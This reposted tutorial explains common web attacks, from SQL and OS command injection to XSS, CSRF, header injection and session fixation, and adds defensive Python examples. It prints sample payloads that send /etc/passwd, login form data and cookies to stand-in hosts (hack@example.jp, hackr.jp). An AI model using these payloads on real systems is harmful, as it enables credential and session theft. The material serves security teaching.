Attack techniques against the Web

  • Active attacks
    • SQL injection attacks
    • OS command injection attacks
    • Session hijacking
  • Passive attacks
    • XSS attacks
    • CSRF attacks
    • HTTP header injection attacks
    • Session fixation attack

I. Active attacks

1. SQL injection attacks

    • What is SQL?
      SQL is the database language used to operate a relational database management system (RDBMS); it can manipulate data or define data.
    • What is SQL injection?
      SQL injection is an attack that runs illegitimate SQL against the database used by a Web application. If the way the application calls SQL statements has flaws, injected malicious SQL statements may be executed.
    • SQL injection case:
SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1 

In SQL, everything after -- is treated as a comment, so and flag = 1 is ignored.
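The case above, run against an in-memory SQLite database next to the parameterized form that stops it. This is an added example, not code from the original post; the rows, the function names and the choice of Python's sqlite3 module are assumptions.

```python
import sqlite3

def make_db():
    """In-memory table shaped like the page's bookTb1 (rows are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE bookTb1 (title TEXT, author TEXT, flag INTEGER)")
    db.executemany(
        "INSERT INTO bookTb1 VALUES (?, ?, ?)",
        [
            ("Published book", "alice", 1),    # flag = 1: meant to be listed
            ("Unreleased draft", "alice", 0),  # flag = 0: meant to stay hidden
        ],
    )
    return db

def search_vulnerable(db, author):
    # The input is pasted into the SQL text, so a quote inside it ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = "SELECT title FROM bookTb1 WHERE author = '" + author + "' and flag = 1"
    return [row[0] for row in db.execute(sql)]

def search_parameterized(db, author):
    # The statement text is fixed; the value travels separately and can only
    # ever be compared, as data, against the author column.
    sql = "SELECT title FROM bookTb1 WHERE author = ? and flag = 1"
    return [row[0] for row in db.execute(sql, (author,))]

CRAFTED = "alice'--"  # constructed input with the same shape as the case above

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "alice"))      # only the flag = 1 row
    print(search_vulnerable(db, CRAFTED))      # the flag filter is commented out
    print(search_parameterized(db, CRAFTED))   # no author has that literal name
```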

2. OS command injection attacks

    • What is an OS command injection attack?
      An OS command injection attack executes illegitimate operating system commands through a Web application.
    • How does the attack work?
      Web applications can invoke operating system commands through the shell. If there are flaws in how the shell is invoked, inserted illegitimate OS commands can be executed. Through OS command injection, the various programs installed on the OS may be run.
    • Example:
| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp
The attacker's input value (; cat /etc/passwd | mail hack@example.jp) contains a semicolon (;). In an OS command, this symbol is parsed as a separator between multiple commands to execute. The sendmail command is therefore cut off at the semicolon, and the command cat /etc/passwd | mail hack@example.jp runs after it. As a result, the /etc/passwd file, which contains Linux account information, is sent by mail to hack@example.jp.
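How the semicolon is handled with and without a shell in between, as an added example that is not part of the original post. It assumes a POSIX system; echo is a harmless stand-in for /usr/sbin/sendmail, and the function names, the address pattern and the sample input are hypothetical.

```python
import re
import subprocess

# Conservative allow-list for the address: no shell metacharacters, and no
# leading "-" that a mailer could read as an option.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+")

def notify_vulnerable(address):
    # shell=True hands the whole string to /bin/sh, which treats ";" and "|"
    # in the input as command separators, exactly as in the case above.
    done = subprocess.run(f"echo mail-to {address}", shell=True,
                          capture_output=True, text=True)
    return done.stdout.splitlines()

def run_without_shell(value):
    # Argument-vector form: no shell parses the value, so it reaches the
    # program as one literal argument, semicolon included.
    done = subprocess.run(["echo", value], capture_output=True, text=True)
    return done.stdout.splitlines()

def notify_safe(address):
    # Validate first, then still avoid the shell.
    if not ADDRESS_RE.fullmatch(address):
        raise ValueError("rejected address")
    done = subprocess.run(["echo", "mail-to", address],
                          capture_output=True, text=True, check=True)
    return done.stdout.splitlines()

# Constructed input; the second command only prints a marker.
CRAFTED = "user@example.jp; echo INJECTED"

if __name__ == "__main__":
    print(notify_vulnerable(CRAFTED))   # two commands ran
    print(run_without_shell(CRAFTED))   # one argument, printed verbatim
    print(notify_safe("user@example.jp"))
```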

3. Session hijacking (Session Hijack)

Session hijacking means that the attacker obtains the user's session ID by some means (for example, using XSS to get the victim's Cookie and, from it, the ID) and illegitimately uses this session ID to impersonate the user, achieving the purpose of the attack.

  • Ways to obtain the session ID
    1. Guessing the session ID when it is generated by a non-standard method;
    2. Stealing the session ID through eavesdropping or an XSS attack;
    3. Forcibly obtaining the session ID through a session fixation attack (Session Fixation).

II. Passive attacks

1. XSS attacks

What is XSS?
Cross-site scripting (XSS) is an attack that runs illegitimate HTML tags or JavaScript in the browser of a registered user of a Web site that has a security vulnerability. XSS is a passive attack: the attacker sets a trap in advance and waits for it to be triggered. For example, the parts of a page where HTML is created dynamically may hide a security vulnerability.

  • Impact:
    • Tricking users into giving up personal information through a fake input form.
    • Using a script to steal the user's Cookie value, so that the victim unknowingly helps the attacker send malicious requests.
    • Displaying fake articles or pictures.
  • How to avoid it:
    • Every place that accepts user input is unsafe.
    • Every place that displays user input is unsafe.
    • Do not use eval in JS.
    • Use innerHTML as little as possible; use innerText instead.
  • Attack cases:
  1. Setting a trap in a form
http://example.jp/login?ID="><script>var+f=document.getElementById('login');+f.action="http://hackr.jp/pwget";+f.method="get";</script><span+s="

After this URI is opened, nothing visibly changes in the browser, but the planted script is running in the background. When the user enters an ID and password in the form, they are sent directly to the attacker's Web site (that is, hackr.jp), and the personal login information is stolen.

 2. Attack that steals the user's Cookie
A maliciously constructed script can, through cross-site scripting in the same way, steal the user's Cookie.

<script src = http://hackr.jp/xss.js></script>

The script file specified here, http://hackr.jp/xss.js, contains the following piece of code written in JavaScript:

var content = escape(document.cookie)
document.write("<img src = http://hackr.jp/?")
document.write(content)
document.write(">")
When this JavaScript runs in a Web application that has a cross-site scripting vulnerability, it can access the Cookie information for that Web application's domain. The information is then sent to the attacker's Web site (http://hackr.jp) and recorded in its access log. As a result, the attacker steals the user's Cookie information.
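The rule that every place displaying user input is unsafe, applied to the login form from case 1: the same ID value rendered with and without output encoding, then parsed to see which tags a browser-like parser finds. This is an added example, not code from the original post; the form markup, the function names and the sample value are constructed.

```python
import html
from html.parser import HTMLParser

# Constructed login form; {id} is where the ID query parameter is reflected.
FORM = ('<form id="login"><input name="ID" value="{id}">'
        '<input name="PW" type="password"></form>')

def render_unescaped(user_id):
    # Reflects the parameter into the attribute as-is (the vulnerable pattern).
    return FORM.format(id=user_id)

def render_escaped(user_id):
    # quote=True also encodes " and ', so the value can neither close the
    # attribute nor open a new tag.
    return FORM.format(id=html.escape(user_id, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag the parser sees in the rendered page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

# Constructed value with the same shape as case 1; the script body is a comment.
SAMPLE_ID = '"><script>/* constructed marker */</script><span s="'

if __name__ == "__main__":
    print(tags_in(render_unescaped(SAMPLE_ID)))  # a script element appears
    print(tags_in(render_escaped(SAMPLE_ID)))    # only the form's own tags
```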

2. CSRF attacks

About CSRF
Cross-site request forgery (CSRF) is a passive attack in which the attacker sets a trap that forces a user who has already authenticated to make unintended updates to personal information, settings or other state.

  • Impact of cross-site request forgery:
    • Updating settings and other information with the authenticated user's privileges.
    • Purchasing goods with the authenticated user's privileges.
    • Posting comments on a message board with the authenticated user's privileges.
  • The anti-CSRF token scheme
    • When the server receives a request for the route, it generates a random number and embeds it in the page while rendering (typically hidden in a form: <input type="hidden" name="_csrf_token" value="xxxx">).
    • The server sends Set-Cookie to plant the random number in the user's browser, as a session or cookie value.
    • When the user sends a GET or POST request, the _csrf_token parameter goes with it (a form submission needs nothing extra, because it automatically submits every input in the form, including _csrf_token, to the backend).
    • After receiving the request, the backend parses the request's cookie to obtain the _csrf_token value and compares it with the _csrf_token submitted by the user. If they are equal, the request is legitimate.
  • Points to note:
    • Keep the Token in the Session. If the Token is stored in a Cookie and the user has many pages open in the browser, then once some page uses up the Token a new Token is planted, but the HTML of the old tabs still carries the old Token. The user is left wondering why a page opened a few minutes earlier can no longer be submitted.
    • Minimize the use of GET. If an attacker uploads a picture to our site, then when a user loads the picture the browser actually sends a request to the attacker's server, and that request carries a Referer with the URL of the page where the picture is shown. If the interface uses the GET method, that URL has the form:
https://xxxx.com/gift?giftId=aabbcc&_csrf_token=xxxxx

This is equivalent to the attacker obtaining the _csrf_token, which can then be used for a short time to operate other GET interfaces.
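The token scheme and the two notes above, as an added example that is not part of the original post: the token is kept in the server-side session and reused across tabs, and it travels only in a POST body. The in-memory session table, the function names and the session IDs are hypothetical.

```python
import hmac
import secrets

SESSIONS = {}  # session ID -> server-side session data (in-memory stand-in)

def render_form(session_id):
    """Issue side: create the token once per session and embed it in the form."""
    session = SESSIONS.setdefault(session_id, {})
    if "_csrf_token" not in session:
        session["_csrf_token"] = secrets.token_urlsafe(32)
    # POST keeps the token out of the URL, and therefore out of the Referer.
    return ('<form method="post" action="/gift">'
            f'<input type="hidden" name="_csrf_token" value="{session["_csrf_token"]}">'
            '<input name="giftId"></form>')

def handle_post(session_id, form_fields):
    """Check side: compare the submitted token with the one held in the session."""
    expected = SESSIONS.get(session_id, {}).get("_csrf_token")
    submitted = form_fields.get("_csrf_token", "")
    # Reject when either side is missing; otherwise compare in constant time.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403
    return 200

def token_from(form_html):
    # Reads the hidden field back out, as the browser does when submitting.
    return form_html.split('name="_csrf_token" value="')[1].split('"')[0]

if __name__ == "__main__":
    tab_a = render_form("sid-user")  # constructed session ID
    tab_b = render_form("sid-user")  # second tab, same session, same token
    print(handle_post("sid-user", {"giftId": "aabbcc", "_csrf_token": token_from(tab_a)}))
    print(handle_post("sid-user", {"giftId": "aabbcc", "_csrf_token": token_from(tab_b)}))
    print(handle_post("sid-user", {"giftId": "aabbcc"}))  # forged request, no token
```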

3. HTTP header injection attacks

  • What is an HTTP header injection attack?
    An HTTP header injection attack is one in which the attacker inserts a line break into a response header field in order to add arbitrary response headers or a body.
  • What is an HTTP response splitting attack?
    An attack that adds content to the body portion of the response is known as an HTTP response splitting attack.
  • Impact of HTTP header injection attacks:
    • Setting arbitrary Cookie information.
    • Redirecting to an arbitrary URL.
    • Displaying an arbitrary body (HTTP response splitting attack).
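What an inserted line break does to a serialized response, and the check that refuses it, as an added example that is not part of the original post. The redirect handler, the function names and the sample values are constructed.

```python
def build_redirect_unsafe(location):
    # The value is concatenated as-is, so a CR/LF inside it ends the header line.
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {location}\r\n"
            "Content-Length: 0\r\n\r\n")

def build_redirect_safe(location):
    # Refuse control characters outright instead of trying to strip them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in location):
        raise ValueError("control character in header value")
    return build_redirect_unsafe(location)

def parse_response(raw):
    """Split a raw response the way a client does: header lines, then body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = [tuple(line.split(": ", 1)) for line in lines[1:]]
    return headers, body

# Constructed values, shown as they look after URL decoding.
EXTRA_HEADER = "http://example.jp/?cat=101\r\nSet-Cookie: SID=constructed"
EXTRA_BODY = "http://example.jp/\r\n\r\n<p>constructed body</p>"

if __name__ == "__main__":
    print(parse_response(build_redirect_unsafe(EXTRA_HEADER))[0])  # extra header line
    print(parse_response(build_redirect_unsafe(EXTRA_BODY))[1])    # body chosen by the input
    try:
        build_redirect_safe(EXTRA_HEADER)
    except ValueError as err:
        print("rejected:", err)
```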

4. Session fixation attacks

A session fixation attack forces the user to use a session ID specified by the attacker.

  • Session fixation attack case:
    1. The attacker visits the login page.
    2. The server issues a session ID (http://example.com/SID=f5d1234567) to the attacker; the session ID is in the (unauthenticated) state.
    3. The attacker uses the URL from step 2 as a trap to lure the user into authenticating.
    4. After the user authenticates, the session ID is in the (user authenticated) state.
    5. After step 4, the attacker visits the URL from step 2.
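The five steps above replayed against a small session store, once keeping the pre-login ID and once issuing a fresh ID at authentication. This is an added example, not code from the original post; the SessionStore class, its method names and the user name are hypothetical.

```python
import secrets

class SessionStore:
    def __init__(self, regenerate_on_login):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}  # session ID -> authenticated user name, or None

    def new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = None  # issued, not yet authenticated
        return sid

    def login(self, sid, user):
        """Authenticate the browser presenting sid; returns the ID to use afterwards."""
        if sid not in self.sessions:
            sid = self.new_session()   # never adopt an ID the server did not issue
        if self.regenerate_on_login:
            del self.sessions[sid]     # the pre-login ID stops existing
            sid = self.new_session()
        self.sessions[sid] = user
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid)

def replay_case(store):
    """Walk the five steps; return what the pre-login ID resolves to at step 5."""
    known_sid = store.new_session()    # steps 1-2: ID issued, unauthenticated
    store.login(known_sid, "victim")   # steps 3-4: the user authenticates with it
    return store.whoami(known_sid)     # step 5: the same ID is presented again

if __name__ == "__main__":
    print(replay_case(SessionStore(regenerate_on_login=False)))  # authenticated session
    print(replay_case(SessionStore(regenerate_on_login=True)))   # ID no longer valid
```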

Reposted from: https://www.jianshu.com/p/f2a08107599a

Origin www.cnblogs.com/vickylinj/p/11929948.html